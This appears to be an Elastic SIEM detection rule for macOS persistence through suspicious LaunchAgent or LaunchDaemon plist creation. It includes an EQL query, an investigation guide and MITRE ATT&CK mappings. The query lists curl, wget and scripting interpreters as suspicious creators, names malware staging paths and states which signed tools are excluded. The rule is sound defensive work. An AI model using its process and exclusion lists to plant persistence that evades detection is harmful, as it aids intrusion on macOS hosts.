Persistence via Suspicious Launch Agent or Launch Daemon

  1[metadata]
  2creation_date = "2026/01/30"
  3integration = ["endpoint"]
  4maturity = "production"
  5updated_date = "2026/01/30"
  6
  7[rule]
  8author = ["Elastic"]
  9description = """
 10Identifies the creation of a launch agent or daemon property list file containing abnormal or suspicious 
 11values. An adversary may establish persistence by installing a new launch agent or daemon which executes 
 12at login. This rule looks for plist files created in LaunchAgents/LaunchDaemons directories with paths 
 13commonly used by malware.
 14"""
 15from = "now-9m"
 16index = ["logs-endpoint.events.file-*"]
 17language = "eql"
 18license = "Elastic License v2"
 19name = "Persistence via Suspicious Launch Agent or Launch Daemon"
 20references = [
 21    "https://medium.com/red-teaming-with-a-blue-team-mentality/a-brief-look-at-macos-detections-and-post-infection-analysis-b0ede7ecfeb9",
 22    "https://objective-see.org/blog",
 23    "https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket"
 24]
 25risk_score = 73
 26rule_id = "62ba8542-1246-4647-9b84-98aa1bc0760a"
 27severity = "high"
 28tags = [
 29    "Domain: Endpoint",
 30    "OS: macOS",
 31    "Use Case: Threat Detection",
 32    "Tactic: Persistence",
 33    "Data Source: Elastic Defend",
 34    "Resources: Investigation Guide"
 35]
 36timestamp_override = "event.ingested"
 37type = "eql"
 38note = """## Triage and analysis
 39
 40> **Disclaimer**:
 41> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
 42
 43### Investigating Persistence via Suspicious Launch Agent or Launch Daemon
 44
 45LaunchAgents and LaunchDaemons are the standard macOS mechanisms for starting programs automatically at user login or system boot. While essential for legitimate software, these persistence mechanisms are heavily abused by malware including RustBucket (DPRK), Shlayer, and CloudMensis. This detection rule identifies plist file creation in LaunchAgent/LaunchDaemon directories when performed by suspicious processes including scripts executing from temporary directories, unsigned binaries, or scripting interpreters like Python and osascript.
 46
 47### Possible investigation steps
 48
 49- Examine the file.path to identify the specific plist file created and its location (user vs system LaunchAgent/LaunchDaemon directory).
 50- Read the plist contents using plutil or defaults to identify the Program or ProgramArguments configured for execution.
 51- Analyze the process.executable to understand what created the plist file and assess whether execution from that location (temp directory, hidden folder) is suspicious.
 52- Check the process.name and process.code_signature fields to determine if the creating process was a scripting interpreter or unsigned binary.
 53- Locate the binary or script referenced in the plist and calculate its hash for threat intelligence lookups.
 54- Review the parent process chain to trace back to the initial execution vector that led to plist creation.
 55- Correlate with other file and process events to identify additional malware components that may have been deployed simultaneously.
 56
 57### False positive analysis
 58
 59- Legitimate software installers may create LaunchAgents/LaunchDaemons during setup, but typically from signed installer processes rather than scripts in temp directories.
 60- Development and testing environments may use scripting languages to create launch items. Verify with development teams if such activities are expected.
 61- Several legitimate signing IDs are already excluded including vim, JetBrains Toolbox, and Sublime Text.
 62- System utilities like cfprefsd may modify plist files during normal operations and are excluded.
 63- Enterprise deployment tools may use scripts to configure launch items. Document and exclude approved deployment processes.
 64
 65### Response and remediation
 66
 67- Immediately unload the suspicious LaunchAgent or LaunchDaemon using launchctl unload with the plist path.
 68- Remove the malicious plist file from the LaunchAgent or LaunchDaemon directory.
 69- Locate and remove the executable or script referenced in the plist's Program or ProgramArguments keys.
 70- Check for other persistence mechanisms that may have been deployed by the same threat actor.
 71- Review system logs for evidence of the persistence mechanism executing and what actions it performed.
 72- If the detection matches patterns of known malware families (RustBucket, Shlayer), perform comprehensive IOC searches and threat hunting.
 73- Reset any credentials that may have been accessed while the malicious process was running.
 74- Monitor for recreation of similar plist files to detect persistent access or ongoing compromise.
 75"""
 76query = '''
 77file where host.os.type == "macos" and event.type != "deletion" and 
 78  file.extension == "plist" and
 79  file.path like ("/Library/LaunchAgents/*", "/Library/LaunchDaemons/*", 
 80                  "/Users/*/Library/LaunchAgents/*", "/System/Library/LaunchAgents/*",
 81                  "/System/Library/LaunchDaemons/*") and
 82  (process.executable like ("/private/tmp/*", "/private/var/root/Library/*", "/var/tmp/*", 
 83                            "/tmp/*", "/var/folders/*", "/Users/Shared/*", "/var/root/*",
 84                            "/Library/WebServer/*", "/Library/Graphics/*", "/Library/Fonts/*") or
 85   process.name like~ ("python*", "osascript", "bash", "zsh", "sh", "curl", "nscurl", "wget", "java")) and
 86  not process.executable like ("/System/*", "/Library/PrivilegedHelperTools/*") and
 87  not (process.code_signature.signing_id in ("com.apple.vim", "com.apple.cat", "com.apple.cfprefsd",
 88                                            "com.jetbrains.toolbox", "com.apple.pico", "com.apple.shove",
 89                                            "com.sublimetext.4", "com.apple.ditto") and process.code_signature.trusted == true)
 90'''
 91
 92[[rule.threat]]
 93framework = "MITRE ATT&CK"
 94
 95  [rule.threat.tactic]
 96  name = "Persistence"
 97  id = "TA0003"
 98  reference = "https://attack.mitre.org/tactics/TA0003/"
 99
100  [[rule.threat.technique]]
101  name = "Boot or Logon Autostart Execution"
102  id = "T1547"
103  reference = "https://attack.mitre.org/techniques/T1547/"
104
105    [[rule.threat.technique.subtechnique]]
106    name = "Plist Modification"
107    id = "T1547.011"
108    reference = "https://attack.mitre.org/techniques/T1547/011/"
109
110  [[rule.threat.technique]]
111  name = "Create or Modify System Process"
112  id = "T1543"
113  reference = "https://attack.mitre.org/techniques/T1543/"
114
115    [[rule.threat.technique.subtechnique]]
116    name = "Launch Agent"
117    id = "T1543.001"
118    reference = "https://attack.mitre.org/techniques/T1543/001/"
119
120    [[rule.threat.technique.subtechnique]]
121    name = "Launch Daemon"
122    id = "T1543.004"
123    reference = "https://attack.mitre.org/techniques/T1543/004/"